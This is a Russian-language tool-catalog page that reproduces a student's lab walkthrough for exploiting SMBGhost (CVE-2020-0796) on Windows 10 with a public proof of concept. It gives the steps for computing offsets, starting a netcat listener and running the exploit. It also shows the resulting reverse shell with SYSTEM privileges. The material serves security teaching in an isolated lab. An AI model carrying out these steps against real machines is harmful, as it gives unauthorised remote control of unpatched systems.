Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-0796-SMBGhost-Exploit-Demo — Учебный proof-of-concept эксплойт для CVE-2020-0796 (SMBGhost), демонстрирующий RCE без аутентификации на Windows SMBv3. Включает пошаговую настройку лаборатории, расчёт смещений и выполнение reverse shell для контролируемого обучения кибербезопасности. | Kitploit
Инструменты/GitHubGitHub/tdevworks/cve-2020-0796-smbghost-exploit-demo
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной НагрузкиЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHub
tdevworks/cve-2020-0796-smbghost-exploit-demo

CVE-2020-0796-SMBGhost-Exploit-Demo

Учебный proof-of-concept эксплойт для CVE-2020-0796 (SMBGhost), демонстрирующий RCE без аутентификации на Windows SMBv3. Включает пошаговую настройку лаборатории, расчёт смещений и выполнение reverse shell для контролируемого обучения кибербезопасности.

Репозиторий
351 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Демонстрация эксплойта CVE-2020-0796 (SMBGhost)

Этот проект демонстрирует эксплуатацию proof-of-concept (PoC) CVE-2020-0796, также известного как SMBGhost, — критической уязвимости RCE без предварительной аутентификации, затрагивающей Windows 10 и Windows Server с SMBv3. Разработано в рамках школьного проекта по кибербезопасности. Вся заслуга в написании эксплойт-кода принадлежит ZecOps. Я лишь использовал и адаптировал его в образовательных целях для демонстрации эксплуатации CVE-2020-0796 в контролируемой лабораторной среде.

Требования для демонстрации

Для воспроизведения демонстрации требуется следующая настройка:

Машина атакующего

  • VirtualBox (с NATNetwork для сетевого взаимодействия ВМ)
  • Windows 10 (любая свежая версия)
  • Python 3.x (добавлен в системный PATH)
  • Netcat (входит в состав Nmap или устанавливается отдельно)
  • Эксплойт-скрипт из GitHub PoC:
    SMBleedingGhost.py от ZecOps

Машина-жертва

  • VirtualBox (та же конфигурация NATNetwork)
  • Windows 10 версии 1903, выпуск 19H1
    Build 18362.356 – 2019.09, Home или Pro (x64)
  • Брандмауэр Windows отключён (чтобы разрешить доступ через порт 445)
  • Скрипт вычисления смещений из GitHub PoC:
    calc_target_offsets.bat от ZecOps
  • Демонстрация: пошаговая эксплуатация

    Шаг 1: Получение IP-адресов обеих ВМ

    1. Запустите Командную строку на обеих виртуальных машинах — атакующей и целевой.

    2. Выполните следующую команду на каждой машине:

      root@kitploit:~
      ipconfig
      

    Screenshot 2025-05-16 172329

    1. Запишите IP-адреса ВМ — они понадобятся на следующих шагах.

    Шаг 2: Вычисление смещений на целевой ВМ

    1. На целевой ВМ перейдите в папку CVE-2020-0796-RCE-POC-master.
    2. Дважды щёлкните, чтобы запустить скрипт: calc_target_offsets.bat
    • Будут сгенерированы смещения памяти, необходимые для эксплойта.
    • Не закрывайте окно и запишите отображаемые значения — они понадобятся на следующем шаге.

    Screenshot 2025-05-16 172350


    Шаг 3: Обновление эксплойт-скрипта на атакующей ВМ

    1. На атакующей ВМ откройте ту же папку CVE-2020-0796-RCE-POC-master.
    2. Щёлкните правой кнопкой мыши по SMBleedingGhost.py и откройте с помощью Блокнота.
    3. В файле SMBleedingGhost.py прокрутите вниз и найдите раздел, начинающийся с OFFSETS = {.
    4. Замените существующие значения смещений на те, что вы получили с целевой ВМ.
    5. Сохраните файл после редактирования.
    6. Теперь можно закрыть окно со смещениями на целевой ВМ.

    Screenshot 2025-05-16 172403


    Шаг 4: Запуск Netcat-слушателя на атакующей ВМ

    Откройте новое окно командной строки и выполните:

    root@kitploit:~
    ncat -lvp 4321
    
    • Это настроит слушатель на порту 4321 для приёма reverse shell с целевой ВМ в случае успешной эксплуатации.
    • При необходимости номер порта можно изменить.

    Screenshot 2025-05-16 172419


    Шаг 5: Запуск эксплойта с атакующей ВМ

    1. Откройте ещё одно окно командной строки и перейдите в каталог PoC (я сохранил его на Рабочем столе):
    root@kitploit:~
    cd Desktop
    cd CVE-2020-0796-RCE-POC-master
    dir
    
    1. Запустите эксплойт, указав соответствующие IP-адреса и порт:
    root@kitploit:~
    python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
    

    Screenshot 2025-05-16 172450

    Пример, использованный в этой демонстрации:

    root@kitploit:~
    python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
    
    • 192.168.18.61: IP целевой ВМ
    • 192.168.18.62: IP атакующей ВМ
    • 4321: порт, используемый в netcat-слушателе

    Результат эксплуатации

    В случае успеха в окне netcat появится:

    root@kitploit:~
    Microsoft Windows [Version 10.0.18362.356]
    (c) 2019 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>
    

    Это подтверждает, что:

    • целевая ВМ была эксплуатирована;
    • атакующая ВМ теперь обладает привилегиями уровня системы.

    Вы можете проверить доступ, выполнив команду:

    root@kitploit:~
    whoami
    

    Это выведет:

    root@kitploit:~
    whoami
    nt authority\system
    

    Это означает, что атакующая ВМ теперь имеет привилегии уровня системы на целевой ВМ.

    Screenshot 2025-05-16 172512

    Можно также выполнить:

    root@kitploit:~
    ipconfig
    

    Чтобы убедиться, что вы взаимодействуете с сетью целевой ВМ.

    Screenshot 2025-05-16 172550

    Примечание: Целевая ВМ может завершиться аварийно после эксплуатации. Если это произойдёт, вы можете перезапустить её. Сеанс атакующего после перезагрузки нужно будет установить заново.

    Благодарности

    Эта демонстрация основана на публично доступном proof-of-concept, разработанном ZecOps.

    Вся заслуга в написании эксплойт-кода принадлежит ZecOps. Я лишь использовал и адаптировал его в образовательных целях для демонстрации эксплуатации CVE-2020-0796 в контролируемой лабораторной среде.

    Ссылки

    • CVE-2020-0796 Remote Code Execution POC

    Автор

    @tdevworks

    Отказ от ответственности

    Этот репозиторий создан исключительно в образовательных целях.

    Все инструменты, скрипты и методики, представленные в демонстрации, предназначены для понимания уязвимостей кибербезопасности в контролируемой лабораторной среде. Не пытайтесь использовать какие-либо из предоставленных материалов на системах или в сетях, которые вам не принадлежат или на которые у вас нет явного разрешения на тестирование.

    Автор не несёт ответственности за любое неправомерное использование программного обеспечения.

    Скачать инструмент